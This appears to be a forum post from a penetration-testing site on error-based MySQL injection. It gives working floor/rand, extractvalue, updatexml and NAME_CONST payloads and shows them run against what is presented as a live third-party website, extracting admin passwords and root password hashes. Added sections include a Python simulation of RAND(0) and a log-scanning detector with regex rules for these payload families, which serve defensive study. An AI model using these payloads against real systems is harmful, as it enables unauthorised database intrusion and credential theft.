China Network Penetration Testing Alliance

Title: MySQL: exploiting injection through the three error-based modes floor, ExtractValue and UpdateXml

Author: admin    Time: 2015-11-11 19:03
Title: MySQL: exploiting injection through the three error-based modes floor, ExtractValue and UpdateXml

1. Error via floor

Some payloads that trigger the error:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked in the error message. To retrieve other data, replace the expression at the position of version() with the desired subquery.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
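Why these statements end in ERROR 1062, and why the second form needs exactly the three rows its union produces, follows from how MySQL evaluates RAND(0) inside GROUP BY. The Python below is an added example, not part of the original post: it reimplements the MySQL RAND(N) generator (my_rnd() with the seeding used by Item_func_rand; the constants are taken from the MySQL source as I know it and should be treated as an assumption) and simulates how the grouped rows are materialised into a temporary table. The trailing 1 in '5.1.33-community-log1' and 'admin8881' above is that floor value concatenated onto the leaked data.

```python
# Added example (not from the original post): why floor(rand(0)*2) ... GROUP BY
# raises "ERROR 1062 Duplicate entry".  MySQLRand re-implements MySQL's RAND(N)
# (my_rnd() seeded as in Item_func_rand::seed_random); the constants below come
# from the MySQL source as I know it, not from the page, so treat them as an assumption.

MAX_VALUE = 0x3FFFFFFF  # my_rnd() modulus


class MySQLRand:
    """Deterministic re-implementation of MySQL RAND(seed) (assumption: matches my_rnd)."""

    def __init__(self, seed=0):
        # randominit(seed*0x10001 + 55555555, seed*0x10000001), both reduced mod MAX_VALUE
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def rand(self):
        """Return the next RAND() value in [0, 1) exactly as my_rnd() computes it."""
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE

    def floor_rand_times_2(self):
        """floor(rand()*2) as 0 or 1, computed on the integer state to avoid float rounding."""
        self.rand()
        return (2 * self.seed1) // MAX_VALUE


def floor_sequence(n, seed=0):
    """The first n values of floor(rand(seed)*2); for seed 0 this is 0 1 1 0 1 1 0 0 1 1 ..."""
    rng = MySQLRand(seed)
    return [rng.floor_rand_times_2() for _ in range(n)]


def group_by_raises_duplicate(nrows, seed=0):
    """
    Simulate GROUP BY concat(<data>, floor(rand(seed)*2)) over nrows source rows.
    MySQL keys a temporary table on the group expression.  For each row the expression
    is evaluated once to probe for an existing group; if none exists it is evaluated a
    second time when the new group row is inserted.  Because RAND(0) is not constant the
    probe value and the stored value can differ, and the insert can collide with a group
    that already exists: "Duplicate entry ... for key 'group_key'".
    Returns True if the simulated query hits that duplicate, False if it completes.
    """
    rng = MySQLRand(seed)
    groups = set()
    for _ in range(nrows):
        probe = rng.floor_rand_times_2()      # first evaluation: lookup
        if probe in groups:
            continue                           # group exists, count(*) is incremented
        inserted = rng.floor_rand_times_2()   # second evaluation: value actually stored
        if inserted in groups:
            return True                        # ERROR 1062 (23000)
        groups.add(inserted)
    return False


def minimum_rows_for_error(seed=0, limit=20):
    """Smallest number of grouped rows at which the duplicate-key error fires (None if never)."""
    for n in range(1, limit + 1):
        if group_by_raises_duplicate(n, seed):
            return n
    return None


if __name__ == "__main__":
    print("floor(rand(0)*2) sequence:", floor_sequence(10))
    print("rows needed for ERROR 1062:", minimum_rows_for_error())
```

Running it shows the well-known 0 1 1 0 1 1 0 0 1 1 sequence and a minimum of three rows: row 1 probes with 0 and stores 1, row 2 probes with 1 and finds the group, row 3 probes with 0, misses, and tries to store 1 again. That is why the page's second payload builds a three-row union and the first one groups information_schema.tables, which always has far more than three rows. From the defender's side the important observation is that the error text only reaches the client because the application echoes database errors into the response; not displaying them and binding id as a typed parameter removes the channel entirely.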

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'
Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection technique for newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|               |
|---------------|
|       1       |
|               |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
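Seen from the defending side, the four payload families collected in this thread (floor(rand(0)*2) with GROUP BY, extractvalue, updatexml and the paired name_const) all rely on MySQL function names that almost never occur in legitimate query strings, which makes them cheap to flag in web-server access logs or a WAF rule set. The Python below is an added example, not part of the original post: it URL-decodes each request, applies one rule per family and reports the matching lines. The log lines, client addresses and paths are constructed for the example and do not describe any real site.

```python
# Added example (not from the original post): flag the error-based injection payload
# families from this thread in access logs.  Sample lines, IPs and paths are constructed.
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format, shortened).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2015:19:03:01 +0800] "GET /detail.php?id=330&sid=19 HTTP/1.1" 200 5120
10.0.0.9 - - [11/Nov/2015:19:03:07 +0800] "GET /detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 412
10.0.0.9 - - [11/Nov/2015:19:03:12 +0800] "GET /detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 388
10.0.0.9 - - [11/Nov/2015:19:03:15 +0800] "GET /detail.php?id=1%20and%201=(updatexml(1,concat(0x3a,(select%20user())),1)) HTTP/1.1" 500 390
10.0.0.9 - - [11/Nov/2015:19:03:20 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 401
10.0.0.7 - - [11/Nov/2015:19:03:25 +0800] "GET /article.php?id=42&title=floor+plans HTTP/1.1" 200 2048
"""

# One rule per payload family, applied to the decoded, lower-cased, whitespace-folded URL.
RULES = {
    # floor(rand(N)*2) combined with GROUP BY, in either order
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*\bgroup\s+by\b"
        r"|\bgroup\s+by\b.*floor\s*\(\s*rand\s*\("),
    # XPath functions fed a subquery or concat(): the XPATH syntax error channel
    "extractvalue": re.compile(r"\bextractvalue\s*\(.*\b(select|concat)\b"),
    "updatexml": re.compile(r"\bupdatexml\s*\(.*\b(select|concat)\b"),
    # two name_const() columns with the same name: the "Duplicate column name" channel
    "name_const_pair": re.compile(r"\bname_const\s*\(.*?\)\s*,\s*name_const\s*\("),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')


def normalise(url):
    """Decode %xx and '+' twice (catches double encoding), fold whitespace and case."""
    decoded = unquote_plus(unquote_plus(url))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(url):
    """Return the names of all rules that match the request URL (empty list if clean)."""
    q = normalise(url)
    return [name for name, rx in RULES.items() if rx.search(q)]


def scan(log_text):
    """Return (ip, timestamp, status, [rule names]) for every log line matching a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skipped here, worth counting in production
        rules = classify(m["url"])
        if rules:
            hits.append((m["ip"], m["ts"], int(m["status"]), rules))
    return hits


if __name__ == "__main__":
    for ip, ts, status, rules in scan(SAMPLE_LOG):
        print(f"{ts} {ip} HTTP {status} -> {', '.join(rules)}")
```

The harmless request containing the word "floor" is not flagged, because the rules require the function call shape rather than a keyword. Note the HTTP 500 status on every flagged line: an application that lets database errors surface as server errors (or, as in the examples above, prints the MySQL message into the page) is what turns a syntax error into a data-extraction channel, so a status-code spike correlated with these patterns is itself a useful detection signal. The durable fix remains binding the id parameter as a typed value and returning a generic error page.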

Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2